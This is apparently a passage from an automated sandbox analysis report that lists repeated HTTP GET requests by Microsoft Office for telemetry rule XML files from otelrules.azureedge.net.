        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
